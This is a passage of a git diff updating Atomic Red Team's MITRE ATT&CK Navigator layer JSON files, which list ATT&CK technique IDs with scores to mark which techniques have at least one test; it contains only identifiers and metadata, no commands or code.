test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 21e118de..cf3aef14 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.